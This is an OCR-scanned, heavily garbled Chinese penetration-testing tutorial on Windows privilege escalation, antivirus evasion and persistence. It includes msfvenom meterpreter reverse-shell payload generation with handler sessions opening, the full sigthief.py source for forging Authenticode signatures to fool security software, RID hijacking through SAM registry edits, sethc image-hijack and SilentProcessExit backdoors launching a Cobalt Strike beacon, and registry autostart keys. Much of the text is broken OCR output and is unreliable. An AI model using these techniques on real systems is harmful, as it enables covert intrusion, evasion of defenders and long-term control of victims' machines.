85 0): | am 名 称 “ 


ve ^ emefg32. dll 
[3 $*j cmd FTT 


. a & emdi al 32 


ae 计算 机 ioa LL 
— M 5 á CEREN 
—— — ana cm PRES K) 






t BH) [开始 1 菜单 0) 
cmifw« dl 还 原 以 前 的 版 本 V 


emipnpir SEF OD 
~ emlua dl 


is md 
desc RAC) 
aR xt 6) 
E emstp thy ms o 
sl 5$ 8$£0 
ZHEN): |cmd 属性 00 





完成 


依次 顺序 是 
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vo | 搜索 System32 





修改 日 期 





2009/7/14 9 
2009/7/14 9 
2009/7/14 9 
2009/7/14 9 
2009/7/14 9: 
2009/71/14 9 
2008/1/14 9 
2009/7/14 9 
2009/7/14 9 
2009/7/14 9 
2009/7/14 9 


2009/7/14 9 





14 
14 
15 
15 
15 
15 
14 
15 
14 










F: verisign. com 


一 管理 员 : C:\Windows \Systemg2\c 


oft Windows [hR 本 6.1.76801 a 
| «c? 2889 Microsoft Corporation. 保留 所 有 


-\Windows \S ystem32 >whoami 
authorit y\system 


: \Windows SS ys tem32 > 
a 


右 通 用 户 的 提 权 梦 得 以 实现 。 同时 也 可 以 知道 ， 超 链接 是 以 consent exe 的 系统 管理 员 权限 


用 户 的 提 权 对 于 现 有 的 Windows 计 算 机 可 以 达到 大 范围 的 通 杀 ， 但 是 在 渗透 过 程 中 ， 往 
于 程 登陆 的 形式 进行 渗透 ， 甚 至 多 是 命令 行 下 的 。 所 以 该 提 权 漏洞 的 实际 利用 就 是 仁者 见 
而 智 了 。 而 微软 官方 的 漏洞 补丁 信息 显示 为 不 太 可 能 被 利用 ， 祝 大 家 好 运 。 


用 工具 在 平台 中 心 的 作战 中 心中 : 
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第 三 方 组 件 提 权 
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操作 系统 后 门 
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Windows 
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1 hi 
限 长 期 把 控 - 伪 造 无 效 签名 第 一 季 

业 扫 水 或 者 凉 白 开 ， 可 预防 多 种 疾病 。 

pe /github.com/ 


战 中 ， 尤 其 是 需要 长 期 控制 的 目标 ， 除 免 杀 对 抗 安全 软件 以 外 ， 还 需 考虑 人 为 无 意 查看 
数字 签名 是 否 拥有 。 而 许多 安全 软件 ， 又 仅仅 验证 是 否 有 签名 ， 而 非 验证 签名 是 否 有 
于 对 重要 的 目标 ， 需 要 提前 做 多 重 对 抗 准备 。 





yload : 

4 

John html]# msfvenom -p windows/x64/meterpreter/reverse tcp LHOST=192.16€ 
"platform was selected, choosing Msf::Module::Platform::Windows from the F 
rch selected, selecting arch: x64 from the payload 

er or badchars specified, outputting raw payload 

Size: 510 bytes 

ze of exe file: 7168 bytes 


x jx B4. exe EE a 21 xl] 
ag | 


[oor ev53x B4. exe 


应 用 程序 
tmp rev53x 64 


| 

| 

| 

| 

i 

TM : i 
E: \share | 
7.00 KB (7,188 字 节 ) | 
8.00 KB (8,192 FP) | 
| 

| 

| 

| 

| 

| 


2019 年 2 月 19 日 ，21:00:07 
2019 年 2 月 19 日 ，21:00:17 
2019 年 2 月 19 日 ，21:02:02 
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无 法 验证 发 行者 。 您 确实 要 运行 此 软 证 吗 ? 


名 称 : imp rev53x B4. exe 
发 行者 : 未 知 发 行者 

类 型 : 应 用 程序 
发 送 者 ; E:\share 








Iv 打开 此 文件 前 总 是 询问 忆 ) 


成 功 回 连 : 


msf exploit(multi/handler) > show options 
Module options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (windows/x64/meterpreter/reverse tcp): 





Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.104 yes The listen address (an interface may be 
LPORT 53 yes The listen port 


Exploit target: 


Id Name 


© Wildcard Target 


msf exploit(multi/handler) » exploit 


Started reverse TCP handler on 192.168.1.104:53 
Sending stage (206403 bytes) to 192.168.1.101 
Meterpreter session 2 opened (192.168.1.104:53 -» 192.168.1.101:3256) at 201 


rf (m eo 
* 
ked Red dee 


meterpreter » 
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> show options 


loit/multi/handler): 


{wind /x64/meterpreter/reverse tcp): 


irrent Setting Required Description 


Exit technique {Accepted: ‘', seh, thread T none) 
The listen address (an interface may be 
The listen port 


168.1.104:53 -> 192.168.1.101 ) at 2019-02-19 


tmp rev53x. 


html) # -i - -0 tmp_rev53x_64.ca.exe 
tmp 





-—————— 
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tap rev53x B4. ca |o ?| xj 





常规 ”数字 签名 | 安全 | 摘要 | 






电子 邮件 地 址 : 
HD 





成 功 回 连 : 


msf exploit(multi/handler) > exploit 


[*] Started reverse TCP handler on 192.168.1.104:53 
[*] Sending stage (206403 bytes) to 192.168.1.101 
[*] Meterpreter session 3 opened (192.168.1.104:53 -» 192.168.1.101:3259) at 201 





meterpreter » getpid 
Current pid: 972 


explort (multi ndter) > exploit 


Started revers CP handler on 192 


Sending stage {206 to 168.1 


Meterpreter opened (192.168.1.104:53 -> 192.168.1.101:3259) at 2019-02-19 08:04:11 -0500 


meterpreter » getpid 
Current pid: 972 


meterpreter » 


E:\share>tasklist ifindstr "972" 
tmp reu53x 64.ca.exe $72 Console 





世界 杀毒 网 ; 原始 payload VS 原始 payload 签 名 伪造 


无 证 书 伪造 ， 无 免 杀 : 


1290 






SATE 


BEeaf4ídh49c80756eb4e51e 


此 交 件 有 21 个 引擎 


BAHATA O d. 


NS 


中 





fede 上 
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文件 信息 


ani » . - 
DOES mp, rev53x, 54.4 











HE ESI BSH! 


FRG 3600 ER ECT SRA SS 


时 间 : 2019-02-19 21:37:28 


以 上 结果 佐证 ， 许 多 安全 软件 ， 仅 仅 是 验证 是 否 有 数字 签名 ， 而 不 确认 是 否 有 效 。 
后 者 的 话 : 


该 原始 python 在 伪造 证 书 时 ， 需 要 注意 2 点 : 





。 原始 证 书 文件 需要 对 应 目标 机 的 机 器 版 本 以 及 位 数 ， 如 目标 机 是 Windows 2003， 那 么 需要 原 
台 带 证 书 文件 也 为 Windows 2003 的 文件 。 包 括 第 三 方 文件 。 

。 伪造 证 书后 ， 例 : 在 Windows 2003 开启 验 安全 验证 后 ， 双 击 无 法 运行 ， 也 无 报错 ， 需 要 命令 
行 下 执行 即 可 。 


附录 : sigthief.py 
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a 
‘se import OptionParser 


ile_info_win(binary): 


arrowed from BDF... 
‘could just skip to certLOC... *shrug* 


EU 

= open(binary, 'rb') 
i .seek(int('3C', 16)) 
"rtms['buffer'] = 0 


flItms['pe header location'] - struct.unpack('«i', binary.read(4))[0] 

# Start of COFF 

binary.seek(flItms['COFF Start']) 

"flItms[ 'MachineType'] - struct.unpack('«H', binary.read(2))[9] 

"binary.seek(flItms['COFF Start'] + 2, 0) 

?flItms['NumberOfSections'] = struct.unpack('«H', binary.read(2))[0] 

- flItms[ 'TimeDateStamp'] - struct.unpack('«I', binary.read(4))[0] 

" binary .seek(flItms['COFF start'] * 16, 0) 

_ fiItms['SizeOfOptionalHeader'] = struct.unpack('«H', binary.read(2))[0] 

|" flitms['Characteristics'] = struct.unpack('«H', binary.read(2))[0] 

~ #End of COFF 

—flitms['OptionalHeader start'] = flItms['COFF Start'] + 20 

df flItms['SizeOfOptionalHeader']: 

1 #Begin Standard Fields section of Optional Header 

— binary.seek(flItms['OptionalHeader start']) 

3 flitms['Magic'] = struct.unpack('«H', binary.read(2))[0] 

上 flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[9] 

flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0] 

flItms['SizeOfCode'] = struct.unpack("«I", binary.read(4))[0] 

flItms['SizeOfInitializedData'] = struct.unpack("«I", binary.read(4))[0] 

flitms['SizeOfUninitializedData'] = struct.unpack("<I", 
binary.read(4))[€ 

flItms['AddressOfEntryPoint'] = struct.unpack('«I', binary.read(4))[0] 

flItms['PatchLocation'] = flItms['AddressOfEntryPoint'] 
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flitms['BaseOfCode'] = struct.unpack('<I', Binarysread(4)) rug E 
if flItms['Magic'] != 0x20B: y 

flItms['Base0fData'] = struct.unpack('<I', binary.read(4))[9] 
# End Standard Fields section of Optional Header 
* Begin Windows-Specific Fields of Optional Header 
if fllItms['Magic'] == 9x208: 

flitms['ImageBase'] = struct.unpack('«Q', binary.read(8))[9] 
else: 

flitms['ImageBase'] = struct.unpack('«I', binary.read(4))[0] 
flItms['SectionAlignment'] = struct.unpack('«I', binary.read(4))[9] 
flrtms['FileAlignment'] = struct.unpack('«I', binary.read(4)) [0] 
flitms['MajorOperatingSystemVersion'] = struct.unpack('«H', 


















binary.re, 
flrtms['MinorOperatingSystemVersion'] = struct.unpack('«H', 
binary.rei 
flitms['MajorlImageVersion'] = struct.unpack('«H', binary.read(2))[0] 
flItms['MinorImageVersion'] = struct.unpack('«H', binary. read(2)) [0] 
flitms['MajorSubsystemVersion'] = struct.unpack('«H', binary.read(2)| 
flItms['MinorSubsystemversion'] = struct.unpack('«H', binary.read(2)) 
flItms['Win32VersionValue'] = struct.unpack('<I', binary. read(4)) [0] 
flitms['SizeOfImageLoc'] = binary.tell() 
fliItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0] 
flrtms['SizeOfHeaders'] = struct.unpack('«I', binary.read(4))[0] 
flitms['CheckSum'] = struct.unpack('«I', binary.read(4))[0] 
flItms['Subsystem'] = struct.unpack('«H', binary.read(2))[9] 
flrtms['DllCharacteristics'] = struct.unpack('«H', binary.read(2))[0] 
if fllItms['Magic'] == 0x29B: ; 
flItms['SizeOfStackReserve'] = struct.unpack('«Q', binary.read(8)) 
flItms['SizeOfStackCommit'] = struct.unpack('«Q', binary.read(8))I 
flItms['SizeOfHeapReserve'] = struct.unpack('«Q', binary.read(8)) 
flItms['SizeOfHeapCommit'] = struct.unpack('«Q', binary.read(8))[f 


else: 
flrItms['SizeOfStackReserve'] = struct.unpack('«I', binary.read(4)) 
flItms['SizeOfStackCommit'] = struct.unpack('«I', binary.read(4))L 
flrtms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[ 
flItms['SizeOfHeapCommit'] = struct.unpack('«I', binary.read(4))[® 

flItms['LoaderFlags'] = struct.unpack('«I', binary.read(4))[0] # zero 

flItms['NumberofRvaAndSizes'] = struct.unpack('«I', binary.read(4))[0] 

# End Windows-Specific Fields of Optional Header 

4 Begin Data Directories of Optional Header 

fllItms['ExportTableRVA'] = struct.unpack('«I', binary.read(4))[9] 

flItms['ExportTableSize'] = struct.unpack('«I', binary.read(4))[0] 

flrtms['ImportTableLOCInPEOptHdrs'] = binary.tell() 

#ImportTable SIZE|LOC 

flItms['ImportTableRVA'] = struct.unpack('«I', binary.read(4))[0] 

flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[9] 

flItms['ResourceTable'] = struct.unpack('«Q', binary.read(8)) [0] 
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"tms[ 'ExceptionTable'] - struct.unpack('«Q', binary.read(8))[9] 
Iems['CertTableLOC'] = binary.tell() * e" 
Itms['CertLOC'] = struct.unpack("<I", binary.read(4))[0] 

Itms[ 'CertSize'] = struct.unpack("«I", binary.read(4))[0] 
nary.close() 


5 = gather_file_info_win(exe) 


Itms['CertLoc'] == © or flItms['CertSize'] == 0: 
t not signed 

yrint ("Input file Not signed!") 

ys .exit(-1) 


'open(exe, rb: as f: 
f.seek(flItms['CertLOC'], 0) 

t = f.read(flItms['CertSize']) 
irn cert 


ert(cert, exe, output): 
= gather file info win(exe) 


= output = str(exe) + " signed" 
itil.copy2(exe, output) 
nt ("Output file: {0}".format (output) ) 


h open(exe, 'rb') as g: 

With open(output, 'wb') as f: 

: .write(g.read()) 

.Seek(0) 

.seek(flItms['CertTableLOC'], 0) 
-write(struct.pack("<I", len(open(exe, 'rb').read()))) 
.Wwrite(struct.pack("«I", len(cert))) 

.seek(0, io.SEEK END) 

-write(cert) 


> h ch ch ch th och 


Fint("Signature appended. \nFIN.") 


utputCert (exe, output): 
ak = copyCert (exe) 
‘TY not output: 
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def 


def 


def 


print("Output file: {0}".format(output) ) 


output = str(exe) + "sig? 


- » 


open(output, 'wb').write(cert) 


print("Signature ripped. \nFIN.") 


check sig(exe): 
flItms = gather file info win(exe) 


if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0: 
# not signed 
print("Inputfile Not signed!") 

else: 
print("Inputfile is signed!") 


truncate(exe, output): 
flitms = gather file info win(exe) 


if flItms['CertLOC'] == © or flItms['CertSize'] == 0: 
# not signed 
print("Inputfile Not signed!") 
sys.exit(-1) 
else: 
print( "Inputfile is signed!") 


if not output: 
output = str(exe) + " nosig" 


print("Output file: (0j".format(output)) 


shutil.copy2(exe, output) 





with open(output, "r+b") as binary: 
print('Overwriting certificate table pointer and truncating binary') 
binary.seek(-flItms['CertSize'], io.SEEK_END) 
binary.truncate() 
binary.seek(fllItms['CertTableLOC'], 0) 
binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00") 


print("Signature removed. NnFIN.") 


signfile(exe, sigfile, output): 
flitms = gather file info win(exe) 
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en(sigfile, 'rb').read() 


= output = str(exe) + " signed" 


l ya (exe, output) 


put file: (0)".format(output)) 


exe, 'rb') as g: 
pen(output, 'wb') as f: 
write(g.read()) 


Le seek(flItms['CertTablelOC'], ©) 
f.write(struct.pack("«I", len(open(exe, 'rb').read()))) 
- f.write(struct.pack("«I", len(cert))) 

| f.seek(0, io.SEEK END) 

f.write(cert) 

ignature appended. \nFIN.") 


EIU main ^": 

‘usage: %prog [options]' 

= OptionParser() 

fmvadd_option("-i", "--file", dest-"inputfile", 
help="input file", metavar="FILE") 


r.add option('-r', '--rip', destz'ripsig', action-'store true', 
help-'rip signature off inputfile') 
.add option('-a', '--add', dest-'addsig', action='store_true', 
help='add signautre to targetfile') 
.add option('-o', '--output', dest='outputfile', 
! help='output file') 
Ser.add option('-s', '--sig', dest='sigfile', 
1 help='binary signature from disk') 
'ser.add option('-t', '--target', destz'targetfile', 
r help='file to append signature to!) 
"Ser.add option('-c', ! --checksig', dest='checksig', action='store_true', 
P. help='file to check if signed; does not verify signature') 
irser.add_option('-T', '--truncate', dest="truncate", action='store_true', 


al help='truncate signature (i.e. remove sig)') 
tions, args) = parser.parse args() 


Yip signature 

Anputfile and rip to outputfile 

M options.inputfile and options.ripsig: 

— Print("Ripping signature to file!") 
outputCert(options.inputfile, options.outputfile) 
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sys.exit() 
w , » 
# copy from one to another 
# inputfile and rip to targetfile to outputfile 
if options.inputfile and options.targetfile: 
cert = copyCert(options.inputfile) 
writeCert(cert, options.targetfile, options.outputfile) 
sys.exit() 


# check signature 

# inputfile 

if options.inputfile and options.checksig: 
check sig(options.inputfile) 
sys.exit() 


4 add sig to target file 





if options.targetfile and options.sigfile: 
signfile(options.targetfile, options.sigfile, options.outputfile) 
sys.exit() 


# truncate 

if options.inputfile and options.truncate: 
truncate(options.inputfile, options.outputfile) 
sys.exit() 


parser.print help() 
parser.error("You must do something!") 
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jws 持 久 控制 总 结 


Wwindows 用 于 持久 控制 的 后 门 。 
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Ed } 








aeae puo: d 
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Windows RID 动 持 


RID 


Relative Identifier 相对 标识 符 Windows 系 统 帐 户 对 应 固定 的 RID: 


e 500: ADMINISTRATOR 

e 501: GUEST 

。 502: krbtgt( 域 环境 ) 

。 512: Domain Admins( 域 环境 ) 

。 513: Domain Users( 域 环境 ) 

。 514: Domain Guests( 域 环境 ) 

。 515: Domain Computers( 域 环境 ) 
。 516: Domain Controllers( 域 环境 ) 


SID 





全 称 Security Identifiers( 安 全 标识 符 )， 是 Windows 系 统 用 于 唯一 标识 用 户 或 组 的 可 变 长 度 结构 


用 户 使 用 帐户 名 引用 帐户 ， 但 是 操作 系统 内 部 使 用 其 安全 标识 符 (SID) 引用 在 帐户 的 安全 上 下 贡 
中 运行 的 帐户 和 进程 。 对 于 域 帐户 ， 通 过 将 域 的 SID 与 该 帐户 的 相对 标识 符 (RID) 串联 来 创建 安 
主体 的 SID。SID 在 其 范围 内 ( 域 或 本 地 ) 是 唯一 的 ， 并 且 永 不 重用 。 


SID 包 含 以 下 信息 : 


* The revision level of the SID structure 
* 48-bit identifier authority value 
* relative identifier (RID) 


s\system32>whoami /all 





什么 是 RID 动 持 


通过 覆 写 注册 表 数 据 ， 可 以 在 被 攻击 设备 上 支持 任意 用 户 的 RID， 并 将 其 分 配给 另外 一 个 用 户 。 
。 被 支持 账户 没有 启用 的 情况 ， 依 旧 可 以 达到 支持 的 效果 
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图 户 拥有 被 动 持 用 户 的 权限 
由 多 操作 会 以 被 动 持 用 户 的 身份 留存 事件 日 志 


由 系统 来 说 ， 注 册 
0 AL_MACHINE\SAM\SAM\Domains\Account \Users\Names T&$ZUBjs 的 所 有 帐户 
性 的 默认 键 值 对 应 该 帐户 详细 信息 的 注册 表 位 置 ( 即 RID 的 十 六 进 制 表示 ) 


SES ROOT $5 (BRA) 
RENT_ USER 

_MACHINE 

0000000 


ARE 


(LO 





saM 
v Domains 





|... Account 


> Aliases 
Groups 


t 
NW 
AR 
B. 
| 
i 
| 


000001F5 


000001F7 
000001F8 
000003E9 


"v Names 











Administrator 


Guest 


i 

i DefaultAccount 
| 

i user 





WDAGUtilityAccount 


query HELIN SAM, SAM \ Domains \Account VU: 


VA 


SAMA\Domains \Account \ 


AM Domains \Account \ 


AM Domains 


[Domain 


\SAH\ Domains \Ac 


利用 演示 


查看 要 更 改 权限 的 用 户 对 应 RID 


修改 起 在 注册 表 中 的 F 键 的 值 


HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ 


RID 对 应 的 值 分 别 为 offset Ox30f Ox31f 


计算 机 AH KEY LOCAL MACHINE\SAM\SAM\Domains\Account\Users\000003 





XUBEFN) 


E 


ST EESR(V) 
jeeeeeeee 
eeeepee8 
leeeeea196 
Beee618 


(2000802 
ionnpapns 








W BEBE SO 
leegeeese 
98606058048 
[88886858 


修改 为 F4 和 01 ， 对 应 十 进 制 500 为 Windows 系 统 内 置 管理 员 administrator 


m ci 
QU 


Us 


186000830 


to Com ei 
ce 


ec 
Cc I 


"n ei 


Qn Owon 
QAMmMAr @w Oo; 





5C 
ee 
47 
ao 
EB 
ei 
eo 
ei 
eo 
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E9 





peer 
BAD 









可 y LOCAL MACHINE\SAM\SAM\Domains\Account\Users\ 00 








ERR 数据 

0 
)0 
4 

03 ee 1 @ oe 8 00 ee 

00 00 oo oo oo- Ge oð 8 

00 8 00 6 oo eo eo 8 

00 00 eo eo 6 ee eo oð : : 

FF FF FF FF FF FF FÉ ?F 3 $Y Y Y y 

00 eo oo à 00 00 oo o0 o0 i 

F 01 60 eo ol 8 @ oð ô 

11  e2 08 @ 0 00 8 0 

00 eo 60 eo ol ee oo ee 

00 00 89 28 72 62 6 00 (r 


管理 员 : C:\Windows\system32\cmd.exe 


oft Windows LARAS 6.3.9600] . 
413 Microsoft Corporation. 保留 所 


> Midninistrator»uhoani 
snuup6saNadministrator 


ers\Administrator>net user 


\Administrator>net user test 
COST 


4 是 以 管理 员 的 身份 进行 登录 ， 相 当 于 继承 了 administrator 权 限 
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4 计算 机 


p- HKEY CLASSES ROOT 
b HKEY CURRENT USER 
4 HKEY LOCAL MACHINE 
i 8CD00000000 
> HARDWARE 


4 Domains 
4 Account 
b Aliases 
b Groups 
4 Users 
000001F4 
000001F5 
000003E9 
000003EA 
p Names 
b Builtin 
LastSkuUpgrade 
RXACT 
SECURITY 
p SOFTWARE 
b SYSTEM 
b HKEY USERS 
b HKEY CURRENT CONFIG 


5 a.i 
i a 
;访问 的 位 a. WIN-BH7SVRRDGVA 
a.b 
公用 


Rea es 


pe 


ab) (8534) 


$5 
ne 


te ForcePasswor... 


"eV 






REG, SZ XUBGGOBN 
REG BINARY 02 00 01 00 00 00 00.00 
REG BINARY 00 00 00 00 
REG BINARY 00 00 00 00 d4 00 00 09 





F 


数值 会 称 (N): 


DEEV): 


编辑 一 进 制 数值 





0008 








已- 


foo00 [02 


12 








msf 对 应 的 模块 : windows/managerrid_hijack 


在 实战 环境 中 可 以 启用 guest 用 户 ， 提 升 该 帐号 的 权限 。 
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是 Windows 内 设 的 用 来 调试 程序 的 功能 ， 但 是 现在 却 往往 被 病毒 恶意 利用 。 当 用 户 双 
序 后 ， 操 作 系统 就 会 给 外 壳 程 序 (例如 “explorer.exe”") 发 布 相 应 的 指令 ， 其 中 包含 有 执 
径 和 文件 名 ， 然 后 由 外 过 程序 来 执行 该 程序 。 事 实 上 在 该 过 程 中 ，Windows 还 会 在 注册 
径 中 查询 所 有 的 映像 动 持 子 键 ， 如 果 存 在 和 该 程序 名 称 完全 相同 的 子 键 ， 就 查询 对 应 子 
Dubugger" 刍 值 名 ， 并 用 其 指定 的 程序 路 径 来 代替 原始 的 程序 ， 之 后 执行 的 是 遭 到 " 动 


技术 的 利用 ， 存 在 已 久 ， 这 里 再 简单 说 明 下 : 修改 注册 
-LOCAL_MACHINE\SOFTWARE\Microsoft Windows NT\CurrentVersion\Image File 

Options 下 sethc.exe， 添 加 一 个 Debugger 字 符 值 (REG SZ) ， 并 且 赋 值 为 cmd.exe 
EZ C:\windows\system32\cmd.exe 


-oxi 





EEN WERA 都 助 00 
>, Drivers32 ^ 
i EFS 


Event Viewer 







L3 







a) Debugger REG SZ C: windows Nsystem32 V cmd. exe 





L Font Drivers 
> Font Management 
FontDFI 
; FontLink 
FontMapper 
Fonts 
|, FontSubsti tutes 
, GRE Initialize 
ICH 
Image File Execution Q@tions 
>, DLUMOptions 
4; IEInstal. exe 
sethc. exe 
IniFileMappine 
$. InstalledFeatures 
> KnownFuncti onTableDlls 
i5 KnownManagedDebuggingDlls 
LanguagePack 
> MCI Extensions 
MCI32 
L MiniDunpAuxiliaryDlls 
+). MsiCorruptedFileRecovery 
j, Multimedia 
5 NetworkCards 
jp NetworkLi st 
js Ntydn64 
ÜpenGLIrivers 
5 PeerDist 





xecution Üptionsisethe. exe HE m 
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ft Vindous Ehi 1.76011 
UB «c» 2889 Microsoft Corporation 





映像 劫持 后 门 新 玩法 
实现 效果 


键入 五 下 Shift 执 行 时 ， 先 执行 sethc.exe 程 序 ， 当 sethc.exe 程 序 静默 退出 时 ， 执 行 CobaltStrike 的 
Powershell， 反 弹 Beacon shell o 


简单 来 说 就 是 : 程序 A 静默 退出 结束 后 ， 会 执行 程序 B。 


GFlages 测 试 
文章 地 址 ; 


下 载 gflags.exe 
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[^ Embe notification 









4 


|^ Enable Sikent Process Exit Monitoring 
[^ Launch montar process 
M ipare Sak Ents 


[ Erate dump colection 


Ic SIS SY TUE? cmd eue 





^s | Custom Dump Type [^ 













E GRE Initio 
d. xw 
Etage File Exe 









A. Installed 
Row et ic 
KomnMar 








Neitorrupted?ileRecoc: 
Multimedia 
NetworkCayd 


NetsorkList 

tdri 

ÜpeneLImise: 
Dist 


Profil 
p : 


hof 





ud 


nu 


i] 





官方 文档 描述 ， 在 Silent Process Exit 选 项 卡 中 的 配置 ， 
自动 添加 并 修改 了 “IFEO" 目 录 下 sethc.exe 的 GlobalFlag 值 。 


entProcessExit 下 ReportingMode 和 MonitorProcess 两 个 值 。 


都 保存 在 注册 表 中 。 









—' 


SOFTWARE Microsoft Windows XT CurrentVersion Image File Execution Üptions sethe. exe 





stallable. driver 


rt 


EY Y LOCAL MACHINE SOFTNARE \Micrasaft Windows ST\CurrentVersion Si lentProcesxEsit \sethe. sae 


这 时 测试 会 发 现 ， 当 键入 五 下 Shift 时 ， 先 执行 sethc.exe 程 序 ， 当 sethc.exe 程 序 静默 退出 时 ， 便 会 
执行 cmd.exe 程 序 。 


URED, bat 





— 





















可 以 直接 在 命令 行 中 对 注册 表 进 行 设置 。 (需要 管理 员 权 限 ) 

















n ` 


IHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution 
SHKLM\SOFTWARE\Micr osoft \Windows NT\CurrentVersion\Image File Execution 
WHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\set 
"HKLMNSOFTWARE Microsoft \Windows NT\CurrentVersion\SilentProcessExit\set 


BC > 


ReportingMode 和 MonitorProcess 这 两 个 项 值 的 作用 。 MonitorProcess 的 值 
CHEA Reporting Mode 可 以 设置 为 三 个 值 。 


Flag Value 解释 


检测 到 进程 静默 退出 时 ， 将 会 启动 监视 器 进程 
(在 GFLAGS.exe 中 ，Silent Process Exit 这 个 


| MONITORPROCESS Ox1 
NT 选项 卡 所 填写 的 值 ， 即 MonitorProcess 的 项 







f&) 
Bu oo 检测 到 进程 静默 退出 时 ， 将 会 为 受 监视 的 进程 
E 创建 转 储 文件 


FICATION 0x4 检查 到 进程 静默 退出 时 ， 将 会 弹出 一 个 通知 


baltstrike 结 合 利用 


E, BERKA, I Monitorprocess 值 放 入 CobaltStrike 的 powershell。 这 样 ， 可 以 
中 做 到 权限 的 维持 ， 按 五 下 Shift 就 可 以 隐蔽 进行 反 连 。 





jader 
tification 


ileList | 
I 

| 

ited. desc | 
| 

| 

i 

i 

i 

i 





Userinstallable driv 
erf 

in s 

B. | 






ieations 





Fu e : cusa dea 2J 


ACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethe. exe 
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实测 ，Windows 锁 屏 ， 键 入 五 下 Shift 后 正常 弹 粘 滞 键 ， 关 闭 之 后 执行 Powershell 代 码 ， 反弹 pea 
shell. ; : | 





fventiog X Listeners X 


















s 权限 维持 篇 - 注册 表 维权 


中 每 个 攻击 组 成 员 需要 花费 大 量 的 时 间 和 精力 进行 获取 权限 撕 开 口子 还 要 保证 权限 不 
次 获得 的 权限 都 来 之 不 易 ， 那 么 要 怎么 利用 系统 特性 进行 比较 有 艺 (wei) 术 (suo) 性 的 
明和 各 位 师傅 们 探讨 交流 ， 以 及 通过 沟通 辅助 蓝 队 的 策略 、 关 注 点 的 调整 。 


Fe ARATE DATS. 
RSH RE 
B ah ERR (Run, RunEx#@lRunOnce) 


符 串 名 为 load 键 值 ， 为 自 启动 程序 的 路 径 但 是 要 注意 短文 件 名 规则 ， 如 c:\programiiles 应 为 
1 据说 建立 run= 键 值 也 是 可 行 的 ， 需 要 注意 没有 测试 过 。 


2t RRENT_USER\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon 


^! 


erini SNE, 这 个 键 值 默 认为 c\WINNT\system32\userinitexe， 后 面 加 路 径 ， 再 加 逗号 
这 里 也 能 够 使 系统 启动 时 自动 初始 化 程序 。 通 常 该 注册 键 下 面 有 一 个 userinit,exe， 但 这 个 


定 用 逗号 分 隔 的 多 个 程序 ， 例 如 "userinit.exe,OSA.exe” (不 含 引号 ) 。 

it Notify、Shell 键 值 也 会 有 自 启 动 的 程序 ， 而 且 其 键 值 可 以 用 逗号 分 隔 ， 从 而 实现 登录 的 
多 个 程序 。 
lorenRun 注 册 键 和 load、Userinit 不 同 ，Run 键 在 HKEY_CURRENT_USER 和 


LOCAL MACHINE 下 都 有 ， 具 体位 置 是 
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HKEY CURRENT USER|SoftwareMicrosoftWindowsCurrentVersionPoliciesYExplorenRug. 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explore ir 


4. RunServicesOncejt ft 


RunServicesOnce 注 册 键 用 来 启动 服务 程序 ， 启 动 时 间 在 用 户 登 录 之 前 ， 而 且 先 于 其 他 通过 ; 
启动 的 程序 ，RunServicesOnce 注 册 键 的 位 置 是 : 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce 


5、RunServices 注 册 键 RunServices 指 定 的 程序 紧 接 RunServicesOnce 指 定 的 程序 后 运行 ， 两 者 
在 用 户 登录 之 前 ， 位 置 是 : 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersionRunServices 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices 


6, RunOnceSetupst Az RunOnceSetup 指 定 了 用 户 登 录 之 后 运行 的 程序 ， 它 的 位 置 是 : 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceSetup 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSetup 


7、RunOnce 注 册 键 安装 程序 通常 用 RunOnce 键 自动 运行 程序 ， 它 的 位 置 : 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 


HKEY_LOCAL_MACHINE 下 面 的 RunOnce 键 会 在 用 户 登录 之 后 立即 运行 程序 ， 运 行 时 间 在 其 他 
Run 键 指定 的 程序 之 前 。HKEY_CURRENT_USER 下 面 的 RunOnce 键 在 操作 系统 处 理 其 他 Run 刍 以 
及 “启动 "文件 夹 的 内 容 之 后 运行 。 


8、Run 注 册 键 Run 是 自动 运行 程序 最 常用 的 注册 键 ， 位 置 在 : 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 


HKEY_CURRENT_USER 下 面 的 Run 键 紧 接 HKEY_LOCAL_MACHINE 下 面 的 Run 键 运行 ， 但 两 者 
都 在 "启动 "文件 夹 运行 之 前 执行 。Run 的 程序 是 在 每 次 系统 启动 时 被 启动 ，RunServices 则 会 在 每 次 
登录 系统 时 被 启动 。 


9、ImadgeFileExecutionOptions 下 的 注册 表 项 


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutio 
nOptions 
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i 
y * 
BE 


yi, TEHA, AE FIBHE— TUB, FRE AD|bugger, TAE 
区 路 径 。 这 个 是 针对 系统 可 以 设置 每 个 程序 指定 的 纠 错 程序 来 实现 的 。 让 我 感到 意外 
未 用 指明 路 径 . 


Se Sri 现在 的 木马 大 多 不 再 通过 启动 菜单 进行 随机 启动 ， 但 是 也 不 可 掉以轻心 。 如 果 
